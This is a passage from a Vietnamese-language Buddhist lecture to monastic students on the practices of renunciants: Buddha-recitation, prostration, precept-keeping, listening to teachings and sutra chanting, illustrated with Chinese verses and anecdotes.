Trong thời kì kháng chiến, Đại Hòa thượng đầu tiên của tôi là ngài thượng Trí hạ Quang. Ngài đến tị nạn ở chùa Quang Hiếu, Thái Thành, đúng lúc tôi cùng các vị đồng học như pháp sư Diệu Nhiên đang ở đó. Ngài đã cho phép chúng tôi thành lập Phước Điền Công Độc Xã, hằng ngày ngài dạy chúng tôi học, đồng thời hướng dẫn chúng tôi dệt vải, trồng rau, đề xướng sản xuất để phục vụ đất nước. Trong lúc dệt vải ngài thường nhắc chúng tôi: “A-di-đà Phật có quên mất không?”. Qua lời nhắc của ngài, mọi người liền đề khởi câu niệm Phật. Lúc công tác, mọi người cũng niệm Phật dạng như thế, chẳng để vọng tưởng đan xen. Lúc trồng rau cũng như thế, ngài thường hỏi: “Có quên niệm Phật A-di-đà không?”. Bắt đầu từ lúc ấy, tôi đi đường cũng niệm Phật, ngồi trên xe cũng niệm Phật, luôn luôn phát nguyện, tín tâm kiên định, tin tưởng tuyệt đối và hi vọng vãng sinh về thế giới Tây phương cực lạc, được diện kiến đức Phật A-di-đà, chứng Vô sinh pháp nhẫn.
Phải niệm đến không niệm mà niệm, A-di-đà Phật chính là tự tâm. Đó gọi là: “Di-đà chẳng từ bên ngoài”, tức chứng đắc tự tính Di-đà.
Quốc sư Trung Phong nói: “A-di-đà Phật chính là tâm tôi, tâm tôi tức là A-di-đà Phật”. Chúng ta có thể niệm thành công tự tính Di-đà thì gọi là nhất tâm bất loạn, có thể niệm đến nhất tâm bất loạn thì trước mặt là Tây phương. Công phu như thế vô cùng hiện thật, chỉ cần có thể ghi nhớ giữ gìn, thời thời khắc khắc không quên niệm Phật.
Niệm Phật là điều trọng yếu thứ hai mà Tổ sư đã khai thị cho chúng ta tu hành. Hy vọng đại chúng ghi nhớ lời tổ sư dạy, chân thật niệm Phật cho đến khi thành tựu. Như thế mới không cô phụ chí nguyện xuất gia của chúng ta. Đại chúng hãy thử xem!
- Hạnh Lễ Phật
Chữ Hán:
出家要虔禮佛,
消盡平生罪業。
趙州二王供養,
便是這個法則。
Phiên âm:
Xuất gia yếu kiền lễ Phật
Tiêu tận bình sinh tội nghiệp
Triệu Châu nhị vương cúng dường
Tiện thị giá cá pháp tắc.
Dịch nghĩa:
Xuất gia thành tâm lễ Phật
Tiêu trừ tội chướng nhiều đời
Hai vua cúng dường Triệu Châu
Chính nhờ hạnh tu tập này.
Lễ Phật chính là lạy Phật. Luật tạng nói: Lễ Phật một cách chân chính như pháp được rất nhiều điều lợi ích, lợi ích lớn nhất là tiêu trừ tâm ngã mạn. Tâm ngã mạn là một trong sáu món phiền não căn bản, đó là tham, sân, si, mạn, nghi, tà kiến. Trong sáu phiền não căn bản ấy, tâm ngã mạn nằm thứ tư, mà hôm qua chúng tôi đã giảng. Người có tâm ngã mạn không thể tiếp nhận sự hướng dẫn của người khác cho nên chẳng thể tiến bộ, không tiến bộ cũng tức là không thành công. Vì thế, tâm ngã mạn là chướng ngại lớn nhất của người học Phật.
Để tiêu trừ tâm ngã mạn thì hằng ngày phải thường bồi dưỡng đức khiêm cung của chúng ta. Người có đức khiêm cung mới có thể nhận được sự giáo dục tốt. Bồi dưỡng đức khiêm cung chính là diệt trừ tâm ngã mạn, và phương pháp tốt nhất chính là lễ Phật. Chúng ta dù tự đại thế nào, nhưng chỉ cần nhìn tượng Phật thì tự cảm thấy mình bé nhỏ. Một người tự đại cuồng vọng đi đến điện Phật trang nghiêm, nhìn thân tướng oai đức rực rỡ của ngài thì tự nhiên trong lòng sinh tâm hổ thẹn, tâm ngã mạn bỗng dưng tan biến.
Đó chỉ là mới chiêm ngưỡng tôn tượng mà thôi, còn nếu tiến thêm một bước nữa là lễ Phật thì có thể trừ sạch tâm ngã mạn ấy. Bởi vì lúc chúng ta khinh thường thì làm sao có tâm cung kính? Đã năm vóc sát đất thành tâm đảnh lễ thì làm sao còn tâm ngã mạn? Nay đối trước tượng Phật trang nghiêm vĩ đại nên tâm cung kính tự nhiên phát sinh. Vì thế, ngay lúc năm vóc sát đất tôi kính lễ tượng Phật thì tâm vô cùng chí thành, gọi sự chí thành ấy tức là minh[4] vậy, tâm có minh thành thì ngã mạn không còn tồn tại. “Lễ Phật yếu kiền”, ‘kiền’ chính là chí thành, lễ Phật mà không chí thành thì khó được cảm ứng.
Trong kinh, phương pháp lễ Phật được chia thành bảy loại. Bảy phương thức lễ này phát sinh từ tâm lí của người lễ bái. Phương pháp lễ bái tốt nhất là chúng ta quán bài kệ này trong Đại Bi Sám pháp:
“Phật, chúng sinh tánh thường rỗng lặng
Đạo cảm thông không thể nghĩ bàn
Lưới đế châu ví đạo tràng
Như Lai Thích-ca hiện ở trong
Thân con lại hiện trước mặt Ngài
Đầu mặt sát đất thành kính lễ”
Người là năng lễ, tượng Phật là sở lễ, cả hai đều là duyên sinh nên không có tự tính, vì thế nên nói ‘tánh thường rỗng lặng’. Vì rỗng lặng không tướng cho nên năng lễ và sở lễ tương thông, xứng hợp và thể nhập với pháp tính. Thể tính của người năng lễ và thể tính của Phật tương ưng mà có cảm và ứng như thế. Ngay lúc lạy Phật, khi lạy xuống thì quán tưởng: thân Phật có mặt khắp pháp giới, thân con cũng có mặt khắp pháp giới. Như Thiện Tài Đồng tử đi vào lầu của bồ-tát Di-lặc, lúc Thiện Tài đảnh lễ, thân bồ-tát Di-lặc có mặt khắp pháp giới, thân của Thiện Tài đồng tử đang lễ bái cũng thế, có mặt khắp pháp giới, có một đức bồ-tát Di-lặc thì có một vị Thiện Tài đồng tử. Đó gọi là xứng hợp với thể tính mà cùng có mặt khắp nơi. Phương pháp lễ như thế thì có thể đạt được sự cảm ứng bất khả tư nghì. Đó là cách lễ Phật cao nhất.
Ngoài ra, có cách lễ Phật khác là thấy người khác lễ Phật nên mình cũng lễ Phật. Như thế gọi là Phu diễn lễ (lễ Phật mang tính cách hời hợt). Một hình thức lễ Phật khác mang tính ngã mạn, đó là tuy họ cũng cúi đầu lễ bái nhưng trong lòng không ưa, không muốn lễ Phật. Lễ Phật như thế chẳng có ý nghĩa gì, thì đâu cần phải nói đến công đức?
Tóm lại, lúc lễ Phật nên để tâm thanh tịnh, đừng phát khởi một yêu cầu, một mong muốn gì, như thế mới có công đức. Chân thật lễ Phật chẳng nên cho rằng chỉ lễ Phật tự tính mà phải nhờ vào tượng Phật trang nghiêm ở bên ngoài dẫn phát tự tính Phật của chúng ta. Do đó, lễ Phật cần có sự quán niệm.
“Tiêu trừ tội chướng nhiều đời”: lễ Phật như thế lợi ích rất lớn, bởi lễ Phật vốn có cả ý sám hối, đem công đức lễ Phật mà sám hối tội chướng nhiều đời, nên công đức ấy không thể nghĩ bàn. Như ngài Triệu Châu Tùng Thẩm[5] là một vị thiền sư của Phật giáo Trung Quốc, nhân vật điển hình cho sự kiền thành lễ Phật. Nhân vì một đời lễ Phật nên ngài sống rất thọ, được hai triều vua đương thời (Đường Hi Tông và Đường Chiêu Tông) cung kính cúng dường. Ngài đạt được điều phi thường như thế đều nhờ công đức kiền thành lễ Phật. Vì thế, Tổ sư dạy:
“Xuất gia thành tâm lễ Phật
Tiêu trừ tội chướng nhiều đời
Hai vua cúng dường Triệu Châu
Chính nhờ hạnh tu tập này”.
- Hạnh giữ giới
Chúng ta xuất gia học Phật, lấy Tam vô lậu học giới, định, tuệ làm cơ sở mà thượng cầu hạ hóa, kế tục tuệ mệnh của Phật. “Giới” là nền tảng đầu tiên của tam học, là pháp yếu tu hành của bậc trí xuất thế. Giới có ba tên:
- Kinh Di Giáo gọi là Ba-la-đề-mộc-xoa, Trung văn dịch là Biệt giải thoát. Biệt là riêng biệt, trì một điều giới thì có phần giải thoát của điều giới ấy.
- Gọi là Tì-ni hay Tì-nại-da, Trung văn dịch là Luật, hoặc gọi là giới luật. Luật chính là những nội qui trong sinh hoạt của cộng đồng Tăng đoàn, giống như pháp luật của một quốc gia. Pháp luật của quốc gia là những qui ước của cộng đồng nhân dân sống trong nước đó.
- Gọi là Thi-la, Trung văn dịch là giới, giới có nghĩa là cấm chỉ. ‘Chỉ’ chính là ‘chỉ trì’, đồng thời còn có ‘tác trì’. Chỉ trì có nghĩa là không được làm, nên nói: “Không làm các điều ác”. Tác trì nghĩa là nên làm, chính là “Nên làm các điều lành”. Giống như giới chế định trong vòng bốn mươi dặm có pháp sư giảng kinh mà chẳng đến nghe là phạm giới. Việc nên làm mà chẳng làm là phạm; việc đáng làm thì nên làm một cách chuyên cần, đó chính là tác trì.
Chỉ, chúng ta đã biết: không sát sinh, không trộm cắp, không tà dâm, không nói dối, không uống rượu, không nắm giữ vàng bạc vật báu, không đeo tràng hoa, không tự mình ca múa hoặc đi xem nghe, không ăn phi thời, không ngồi giường cao rộng… Chỉ có nghĩa là không nên làm, tức là dừng lại tất cả những hành vi làm trở ngại, tổn hại thân tâm. Tất cả những tội nghiệp làm trở ngại, tổn hại đến sự tu đạo của chúng ta đều phải dừng lại. Tác là những việc làm thúc đẩy, trợ giúp cho đạo nghiệp tăng trưởng. Tất cả những thiện nghiệp giúp chúng ta tu hành thành tựu đều phải tận lực mà làm. Vì thế điều trọng yếu thứ tư của người xuất gia là tu trì giới hạnh. ‘Trì’ nghĩa là kiên trì không giãi đải giữ gìn giới đã thọ giới.
Căn cứ vào luật tạng, người xuất gia tu đạo, năm hạ đầu (tức năm năm đầu tiên sau khi xuất gia) phải chuyên tinh giới luật. Năm hạ tiếp theo mới được nghe pháp, tham thiền. Như thế chúng ta có thể thấy phép tắc xuất gia của Phật rất xem trọng giới luật.
Hiện tại, giới Phật giáo ở Đài Loan bị khiếm khuyết ở phương diện này. Hiếm có nơi nào để người tu trì giới pháp năm năm, cũng hiếm có người y luật thành tâm tu trì, nghiên cứu giới pháp, nên người thụ giới tuy rất nhiều nhưng người trì giới rất ít. Lại thời gian ngắn của kì thuyết giới trong tháng bị tiêu hao bởi những giảng giải lễ nghi, khiến thời gian chính để giảng giới luật bị co hẹp. Vả lại, trong khi giới sư giảng, tân giới tử cũng chẳng mấy người nghe hiểu. Vì thế Phật dạy chúng ta thời gian năm năm chuyên tâm nghiên cứu giới luật; đối với giới học phải có cơ sở nhận thức chính xác, sau đó mới học giáo nghĩa, nghiên cứu giáo lí, tham thiền, tu hành một cách thiết thực. Đó là lộ trình xuất gia tu học.
Như thế, nhờ đoạn trừ tập khí phiền não từ vô thỉ đến nay, Tăng cách của chúng ta được bồi dưỡng. Trải qua quá trình như vậy, tâm xuất gia ban đầu của chúng ta càng thêm vững chắc, nhất cử nhất động cũng không giống thế tục. Thế nên, trì giới đối với người xuất gia tu hành mà nói là vô cùng trọng yếu. Chư Tổ dạy:
Chữ Hán:
出家要持戒行
戒是佛祖正令,
受戒不守毘尼,
徒勞喪身失命。
Hán âm:
Xuất gia yếu trì giới hạnh
Giới thị Phật tổ chính lịnh
Thụ giới bất thủ Tì-ni
Đồ lao tán thân thất mạng.
Dịch nghĩa:
Xuất gia phải trì giới hạnh
Giới là lệnh chính của Phật
Thụ giới chẳng giữ Tì-ni
Uổng công tan thân mất mạng.
Xuất gia tu hành vì sao nhất định phải giữ gìn giới luật? Vì giới là lệnh chính của Phật, là mạng mạch Phật pháp, nên nói: ‘Có áp dụng giới luật chính pháp mới tồn tại lâu dài’. Phật-đà hình thành giáo pháp, trải qua các đời tổ sư, các bậc cao tăng truyền giáo là đều nhờ vào mạng mạch này mà duy trì.
Lúc Đức Phật sắp nhập diệt, một vài tì-kheo còn chưa chứng quả như tôn giả A-nan…chỉ biết đau lòng khóc thương. Tôn giả Ca-diếp là một bậc trưởng lão đức hạnh khuyên tôn giả A-nan: “Nay chẳng phải là lúc để khóc, ông theo Thế Tôn đã lâu, hãy thỉnh giáo đức Thế Tôn mấy vấn đề trước khi Ngài nhập diệt!”. A-nan lau khô nước mắt, vâng lời tôn giả Ca-diếp thỉnh giáo đức Phật.
Thứ nhất, khi Phật còn tại thế thì chúng đệ tử nương theo Phật, sau khi Phật diệt độ chúng đệ tử nương vào ai?
Thứ hai, khi Phật còn tại thế, mọi người nghiễm nhiên tôn Phật là thầy, Phật diệt độ rồi nên tôn ai làm thầy?
Thứ ba, sau khi Phật diệt độ phải kết tập những lời dạy của Ngài để lại, câu đầu tiên của mỗi kinh nên ghi như thế nào?
Thứ tư, trong tăng đoàn có một vài vị tì-kheo tính ác (lục quần tì-kkheo) không giữ gìn qui cũ, thì phải đối trị như thế nào?
A-nan thỉnh giáo Thế Tôn bốn vấn đề như thế.
Phật đáp:
Thứ nhất, chúng đệ tử nương vào tứ niệm xứ mà trụ.
Thứ hai, các đệ tử nên lấy giới luật làm thầy. Sau khi Phật diệt độ, các đệ tử thường hành trì giới luật như lúc Phật còn tại thế không khác.
Thứ ba, câu đầu tiên của kinh nên để bốn chữ: “Như thị ngã văn”.
Vì thế, câu đầu tiên của mỗi bộ kinh trong Phật giáo đều ghi: “Như thị ngã văn”.
Thứ tư, dùng phương pháp mặc tẩn[6] để đối trị với các Tì-kheo tính ác. Đối trị với những kẻ ấy, nếu không tiếp xúc với họ thì họ không có điều kiện thể hiện hạnh ác nữa.
Sau khi Phật giải quyết bốn vấn đề như thế thì mọi người đều an tâm.
‘Lấy giới làm thầy’: là thường hành trì giới pháp đúng như Phật còn tại thế, cho nên nói: ‘Giới là lệnh chính của Phật’.
“Thụ giới chẳng giữ Tì-ni, uổng công tan thân mất mạng”: đã thụ giới rồi thì phải thường trì giới, nên nói thụ giới thì dễ nhưng giữ giới rất khó. ‘Trì’ là giữ gìn trong thời gian dài. Giả như thụ giới mà chẳng thể nghiêm trì giới luật thì tuy xuất gia được thụ giới nhưng chỉ là một đời uổng phí, mất công; lại không chỉ uổng phí mà còn bị tan thân, mất mạng, và càng không thể nghĩ đến chuyện chứng đắc pháp thân tuệ mệnh. Vì người xuất gia chúng ta, được gọi là “Không cày bừa mà có thức ăn, không dệt may mà có áo mặc”, nhận sự cúng dường của tín thí khắp mười phương, nếu không giữ giới tu hành thì phải mang trách nhiệm về nhân quả. Cho nên có câu: “Người xuất gia nếu chưa ngộ được ba tâm thì dù một giọt nước của tín thí cũng khó tiêu[7]”
Giới kinh lại nói:
Một hạt gạo tín thí
Lớn như núi Tu-di
Nếu không thể liễu đạo
Mang lông đội sừng trả.
Đó là quả báo nghiêm trọng khi thụ nhận sự cúng dường của thí chủ mà không giữ giới tu hành. Do đó, Tổ sư đặt trì giới vào điều thứ tư của người xuất gia.
Nay tôi nói để mọi người hiểu được sự trọng yếu của giới pháp. Giới là giềng mối, là lệnh chính của Phật; giới pháp duy trì pháp thân tuệ mệnh của Phật-đà. Vì thế nên pháp sư Thánh Nghiêm nói: “Tam qui, ngũ giới là hộ chiếu qua lại nhân thiên”, có thể giữ gìn bảo vệ thân người của chúng ta không mất. Hi vọng mọi người coi trọng vấn đề này.
- Hạnh học hỏi giáo pháp
Chữ Hán:
出家要去聽教,
不然開口亂道。
胸中半字不留,
佛祖開顏頷笑。
Phiên âm
Xuất gia yếu khứ thính giáo
Bất nhiên khai khẩu loạn đạo
Hung trung bán tự bất lưu
Phật tổ khai nhan hàm tiếu.
Dịch nghĩa:
Xuất gia phải đi nghe pháp
Không thế, mở miệng nói càn.
Trong lòng chẳng chứa nửa chữ
Phật Tổ hoan hỉ mĩm cười.
Thính giáo, tham thiền là lộ trình tu học tất yếu của người xuất gia mà trước đây chúng ta đã giảng qua. Thông lệ xưa nay, ở năm hạ đầu người xuất gia phải tinh chuyên giới luật, sau đó mới cho phép thính giáo, tham thiền. Chuyên tinh giới luật là phải học tất cả những oai nghi, phép tắc liên quan đến đời sống xuất gia; phải học một cách thấu đáo, để mài giũa những tập khí, tục khí của thân tâm, đồng thời tô bồi đạo khí. Nhất cử nhất động phải giống người xuất gia, sau đó mới tiến thêm một bước nữa là thụ giới, thính giáo tham thiền. Đó là qui trình giáo dục người xuất gia chính qui.
Không học hỏi giáo pháp không rõ được nghĩa lí, không tham thiền thì chẳng thể ngộ đạo. Thời nay ở Đài Loan rất ít người theo đúng giáo dục chính qui như thế để tu học, nên người xuất gia hiện nay bên trong không chỉ ít có người ngộ đạo, thông lí mà oai nghi dung tướng bên ngoài cũng chẳng có. Đi không có tướng đi, ngồi không có thế ngồi, có thể mặc bộ áo ngắn, quàng thêm chiếc đãy rồi đi khắp đường phố. Với oai nghi như thế trong con mắt người đời làm sao họ có thể khởi tâm cung kính đối với Tăng bảo? Cũng có thể cho rằng quí vị hoàn toàn không chú ý đến những vấn đề này. Tôi thường đứng ở đầu đường chứng kiến người xuất gia không chú trọng đến oai nghi như thế mà cảm thấy đau lòng!
Chúng ta đến Thái Lan mà xem, có thể thấy người xuất gia ở khắp đường phố, nhưng họ rất chú trọng oai nghi, y của họ mặc giống nhau, họ không mặc áo ngắn, tất cả đều mặc ca-sa theo hệ phái Nam truyền. Họ không mang đãy, đãy tăng được qui định mang trên khuỷu tay trái. Họ có thể giữ gìn oai nghi như thế, cho nên khắp nơi đều cung kính.
Cơ hội duy nhất mà tăng lữ Phật giáo chúng ta tiếp thụ Phật học là thời gian học tập, nhưng hiện nay để xây dựng lại những nền tảng cơ bản, có mấy viện Phật học chú trọng đến oai nghi của Tăng Ni sinh? Gì khác hơn thì tôi không biết, nhưng mà quá khứ chúng ta đã tiếp thụ mô hình giáo dục như thế, và tôi cũng cảm thấy chỉ có như thế thì bên trong Tăng đoàn mới có thể đào tạo thành tựu Tăng tài chân chính; bên ngoài mới có thể trang nghiêm được hình tượng Phật giáo. Do đó, một lần nữa tôi yêu cầu Tăng sinh không nên lạm dụng mang đãy tăng như thế. Có một số ít tăng sinh ngoài mặt thì vâng thuận, nhưng trong lòng lại chống trái, ở đây thì không mang nhưng ra khỏi Hoa Nghiêm Liên Xã thì lại mang. Như thế là không tốt, đó là biểu thị thái độ không tiếp nhận lời dạy của tôi.
Những vị ấy cũng thừa nhận là đang học ở đây nên không thể không tuân thủ qui định của tôi. Kì thật tôi hi vọng những tăng sinh không nên như thế, không nên trong lúc tôi không thấy thì lại mang. Chúng ta phải tự tạo một thói quen tốt, một kỷ luật tốt. Nếu chúng ta không có cơ hội tiếp nhận sự giáo dục có ý nghĩa như thế thì không nói, nhưng nay chúng ta đã có cơ hội tiếp nhận nền giáo dục khá chuẩn mực và huống gì mọi người cũng thừa nhận sự tùy tiện kia là không tốt.
Chúng ta phải ghi nhớ điều đã từng học là Tăng thanh niên tri thức trong thời hiện tại có nhiệm vụ chuyển đổi phong khí bại hoại trong Phật giáo. Phật giáo ở trong xã hội có được mọi người tôn trọng hay không là do tăng sĩ chúng ta tạo nên. Nghìn vạn lần không nên cho rằng, đó là sự bó buộc, như mặc áo ngắn thì tiện lợi, mặc áo dài thì lụng thụng rất bất tiện… Trước sau tôi vẫn thấy rằng đã có sự giáo dục tốt thì cần phải kiên trì thực hành.
Tự chúng ta nếu cảm thấy Phật giáo có một vài hiện tượng bất hợp lí thì phải chủ động đưa ra phương pháp cải đổi. Hình tượng của Phật giáo tốt hay xấu là trách nhiệm cần có của mỗi Phật giáo đồ. Không nên chỉ lo về phương diện cá nhân mà phải hiểu một vài người xuất gia bị xã hội xem thường thì ảnh hưởng đến toàn thể Phật giáo. Nếu tự chúng ta biểu hiện được oai nghi trang nghiêm thì hình tượng Phật giáo có chỗ đứng nơi xã hội, chỗ đứng trong lòng mọi người và vô hình trung chúng ta đã thành tựu hiệu quả truyền giáo. Chúng ta không có điều kiện để đi khắp nơi giảng kinh thuyết pháp, cảm hóa chúng sinh, nhưng chúng ta đã dùng thân giáo để gây được ấn tượng tốt ở mọi người, chuyển biến được những quan niệm không tốt về Phật giáo trước đây của họ. Điều này cũng là công đức vô lượng.
Việc này hi vọng những Tăng sinh chúng ta thực hành một cách chân thực. Quí vị thường nói không nên cô phụ ân Sư trưởng đã cho quí vị học tập, không nên cô phụ ân Viện trưởng đã vun bồi cho quí vị. Nếu nghe lời tôi, quí vị y giáo phụng hành là cách báo đáp tốt nhất. Chúng tôi không muốn quí vị báo đáp bằng bất cứ thứ gì khác.
‘Thính giáo’: Hiện nay ở Đài Loan, khắp nơi đều có thể học hỏi Phật pháp, không giống như thời xưa, muốn nghe giảng kinh phải đi rất xa và còn phải đăng kí với nơi tổ chức. Người xuất gia ngày nay có phúc báo rất lớn, có thể ở tại chùa đợi pháp sư đến giảng pháp. Được phúc như thế không phải dễ, phải trải qua nhiều kiếp gieo trồng căn lành đối với Phật pháp, vì thế cần phải trân quí điều này. Đã có cơ hội để thính giáo thì cần phải nhận rõ giáo pháp mình đang nghe và hơn nữa phải tiếp thu, tiêu hóa, ứng dụng, y giáo phụng hành.
Nếu không thính giáo thì sao? Điều đó gọi là: “Không thế, mở miệng nói càn”. Vì không thông giáo lí, chẳng hiểu Phật pháp cho nên những lời nói ra đều không chứa đựng chất liệu Phật pháp. Hạng người không chịu tu học mà xuất gia trôi nổi theo thế gian rất nhiều. Và đó cũng là nguyên nhân mà Phật giáo đồ không thể kiến lập chính tín. Tình hình chung như vậy, phải đợi những vị Tăng, Ni có giáo dục như chúng ta đứng ra gánh vác trách nhiệm cải đổi.
Trước đây, sư tổ thượng Trí hạ Quang của tôi từng trụ trì một hoặc hai Đại Tòng Lâm ở Giang Tô, như chùa Định Tuệ thuộc Tiêu sơn. Chùa vốn là chốn tòng lâm thuyết giảng kinh giáo, nhưng sau đó do phong trào học tập Phật pháp bị suy vi cho nên Tăng chúng ở đây không nhận chân được thính giáo tham thiền, chỉ có sáng tối lên chính điện niệm Phật, xem đó là sinh hoạt duy nhất của người xuất gia.
Đầu năm Dân quốc (1912) có vị học giả lên núi tham quan, thông qua vị tri khách ông muốn thỉnh Hòa thượng Phương trượng mấy vấn đề. Lúc bấy giờ vị Hòa thượng ở trong Tòng Lâm không phải tùy tiện tiếp khách, tất cả đều do vị tri khách thù tiếp. Sau khi vị tri khách vào bạch, Hòa thượng Phương trượng ra tiếp vị học giả. Vị học giả lễ phép thỉnh Hòa thượng chỉ dạy: Sao gọi là ba tạng, mười hai bộ kinh trong Phật giáo? Vì Hòa thượng cũng chưa từng học qua, hằng ngày cũng chưa hề chú ý đến vấn đề này. Thế rồi Phương trượng trả lời: “Hoa Nghiêm một bộ, Kim Cang một bộ…”. Vị học giả ấy xua tay bảo: “Được rồi sư phụ, ngài đừng nói nữa, đó chẳng phải là mười hai bộ kinh”. Vị Phương trượng lấy làm hổ thẹn, sau khi tiễn khách ông phát tâm thành lập Phật học viện, nhưng trong chùa đại chúng sợ phiền phức, tất cả đều phản đối nên ý nguyện không thành.
Sau, lão hòa thượng thượng Trí hạ Quang nhân cùng Thái Hư đại sư đến học ở tinh xá Kỳ-hoàn và cũng đến Thượng Hải học ở Đại học Hoa Nghiêm do lão pháp sư Nguyệt Hà chủ trì. Sau đó, ngài giữ chức trụ trì chùa Định Tuệ ở Tiêu sơn, ngài cũng lại đề xướng vấn đề thành lập Phật học viện. Đại chúng phản đối rất mạnh. Hòa thượng Trí Quang nói: “Tôi tình nguyện đem chức Phương trượng nhường cho pháp đệ, để tôi chuyên tâm lo Phật học viện”. Mọi người nghe ngài muốn giao chức phương trượng, pháp đệ của ngài liền nói: “Được rồi! để Hòa thượng lo việc Phật học viện”. Vì thế, Phật học viện Tiêu Sơn là do lão nhân Thượng Trí hạ Quang nhường chức trụ trì mà thành lập nên. Đó cũng là một đoạn giai thoại về lịch sử của ngài.
Ở trên là một câu chuyện cười, một chuyện xưa mất mặt do không học tập của chúng ta, và cũng là một dẫn chứng việc mở miệng nói càn.
“Trong lòng chẳng chứa nửa chữ, Phật tổ hoan hỉ mĩm cười”: ‘chẳng chứa nửa chữ’ phải giải thích là không có học vấn, nhưng ‘nửa chữ’ ở đây không thể giải thích là trong lòng không có nửa chữ để thuyết pháp, mà là sau khi đạt ngộ thông hiểu Phật pháp, như thật chứng biết các pháp không thật thể, nên trong lòng không chấp trước, vì thế gọi không còn nửa chữ. Người chưa đạt ngộ, có được một chút tri thức thì muốn khoe khoang; người chân chính học thức thông đạt được gọi là: “Đại trí như ngu”. Viên mãn bồ-đề chính là qui về vô sở đắc, như thế còn có vọng tưởng chấp trước sao? Ngộ đến cảnh giới này giống như Phật Tổ, và chính vì thế mà Phật Tổ rạng rỡ mĩm cười, bởi các Ngài đã có người thừa kế chân chính. Thính giáo để đạt ngộ chân lí, công đức không gì sánh bằng, hi vọng mọi người nổ lực hơn nữa. Nay học hỏi nhiều về Phật pháp thì sau này có cơ hội sẽ thuyết giảng nhiều kinh pháp, trở thành bậc thầy chân chính của trời người.
- Hạnh tụng kinh
Chữ Hán
出家要常念經,
惟誠報答四恩。
信口念出囙字,
自成大藏全文
Phiên âm
Xuất gia yếu thường niệm kinh
Duy thành báo đáp tứ ân
Tín khẩu niệm xuất nhân tự
Tự thành đại tạng toàn văn.
Dịch nghĩa
Xuất gia phải thường tụng kinh
Thành tâm báo đáp bốn ân
Học thuộc tụng lời thánh hiền
Công đức bằng tụng đại tạng.
Hôm nay tôi thấy các vị ăn cơm rất ít, rất nhiều người chỉ ăn một bát, phải chăng tinh thần quá mệt mỏi? Người xưa nói: “Cởi nịt mà ăn, đứng thẳng mà làm người[8]”. Đọc sách chú tâm mà đọc, ăn cơm định ý mà ăn, đó là hai việc phải tập trung. Ăn cơm không nên vì những chuyện vụn vặt mà phiền lụy. Buổi sáng là bắt đầu một ngày, cần có nguyên khí sung mãn nên cần phải ăn nhiều một chút chẳng cần phải vội vàn, tôi sẽ đợi quí vị ăn xong, sau đó mới giảng. Tôi hi vọng, ngày mai mỗi người ăn hai bát cho đến ba bát cháo
Tam tạng kinh, luật, luận, trong đó kinh tạng dạy về định học, luật tạng dạy về giới học, luận tạng dạy về tuệ học. Tụng kinh nhiều có thể khiến cho tâm định, tụng kinh mới rõ lí. Giáo pháp của Phật-đà, chân lí mà chúng ta hiểu cần phải lấy kinh văn để ấn chứng. Xem kinh có thể khiến tâm chúng ta định, đốt một cây hương, mở một quyển kinh, đối trước thánh tượng Phật-đà mà xem kinh, có thể nói là thụ dụng vô thượng. Người xưa vô cùng chú trọng đến việc xem kinh, không chỉ hai chúng xuất gia lấy việc xem kinh làm công khóa cần yếu, mà cư sĩ tại gia cũng xem trọng duyệt đọc kinh Phật, cho đến quan viên nhà nước đều không quên xem kinh.
Năm cuối triều Thanh có Lưỡng quảng Tổng đốc Lâm Tắc Từ là một tín đồ Phật giáo thuần thành, cũng là một vị quan tốt nổi tiếng. Bấy giờ, Lưỡng quảng Tổng đốc phải kiêm luôn việc ngoại giao (thời điểm ấy phát sinh chiến tranh nha phiến vì chính phủ Trung Quốc cấm chỉ người Anh dùng Trung Quốc làm thị trường tiêu thụ nha phiến). Lâm Tắc Từ phụng mệnh cấp trên cấm không cho người dân hút thuốc phiện và thâu được mấy mươi thùng nha phiến đều đem đốt sạch. Người Anh phẫn nộ phát động chiến tranh, nhưng Lâm Tắc Từ chẳng phải người nhu nhược, ông ra sức kháng chiến, đánh bại người Anh. Do lúc ấy, giao thông không thuận lợi, bưu điện chưa lập, tin tức truyền thông rất chậm, chính phủ Mãn Thanh ngu muội, vừa nghe người ngoại quốc đánh mình đã vô cùng hoảng sợ, liên tiếp phái quan khâm sai đến cầu hòa. Vì thế, chuyện này đã tạo nên một giai thoại cười trong lịch sử: Đánh thắng quân địch rồi trở lại cầu hòa với chúng. Đúng là chuyện là nghìn đời có một. Lại trong điều kiện cầu hòa còn kèm theo lời chấp nhận cho người Anh kinh doanh, lập quân khố, buôn bán trao đổi hàng hóa trong địa phận Trung Quốc.
Sau sự kiện đó, nước ta lâm vào cảnh bần cùng, Lâm Tắc Từ người lãnh đạo cuộc chiến này cũng không biết phải làm sao, bởi gặp một chính phủ ngu muội như thế. Ông có biện pháp gì? Chỉ là hằng ngày không quên thời khóa tu niệm của mình, ông không có nhiều thời gian để xem kinh, chỉ chép kinh lại trên mãnh giấy rồi dán trong kiệu để xem. Như thế, thời gian ngồi trên kiệu là lúc xem kinh. Ông tụng kinh Kim Cương rất linh nghiệm. Có lần thuộc hạ đã chết của ông báo mộng cho vợ mình, muốn bà ấy đến thỉnh Lâm đại nhân tụng một quyển kinh Kim Cương để siêu độ cho ông ta. Lâm đại nhân hoan hỉ hứa khả. Ngày sau đó, sáng sớm ông đã ở trong thư phòng tụng kinh Kim Cương siêu độ cho thuộc hạ của mình. Lúc ấy, người ở mang trà đến, làm kinh động, thế rồi ông liền xua tay ra hiệu không dùng trà và lại tiếp tục tụng kinh.
Đêm đến, người ấy về báo mộng với vợ rằng: “Lâm đại nhân tụng kinh không có tác dụng, bởi khi tụng ông đã thêm hai chữ ‘không dùng” và người ấy muốn vợ thỉnh Lâm đại nhân tụng kinh lại. Đến ngày thứ ba, vợ của người ấy đem việc nằm mộng thưa với Lâm đại nhân, thỉnh Lâm đại nhân tụng lại cho chồng bà một bộ kinh. Lâm đại nhân vừa nghe câu chuyện liền biết nguyên nhân là do khi người hầu dâng trà, ông đã xua tay và trong lòng nghĩ “không dùng” nên hai chữ trong tâm tưởng ấy đã xen vào trong khi tụng kinh. Thế rồi ông bảo: “Được, tôi sẽ tụng lại”. Ngày sau, ông đóng thư phòng không để người hầu vào, tụng kinh Kim Cương một cách thành kính. Tối hôm ấy vị thuộc hạ đã mất ấy đến báo mộng cảm tạ với Lâm đại nhân: “Tôi nhờ công đức tụng kinh của ngài mà được siêu sinh”.
Vì thế, sự cảm ứng của việc tụng kinh thật là bất khả tư nghì! Nhưng lúc tụng kinh phải thành tâm. Tâm nghĩ đến báo ân, chỉ một phiến tinh thành chuyên nhất, không khởi vọng tưởng. Tụng kinh một cách thành kính, thì trên có thể báo đáp được bốn ân, dưới có thể cứu khổ ba đường.
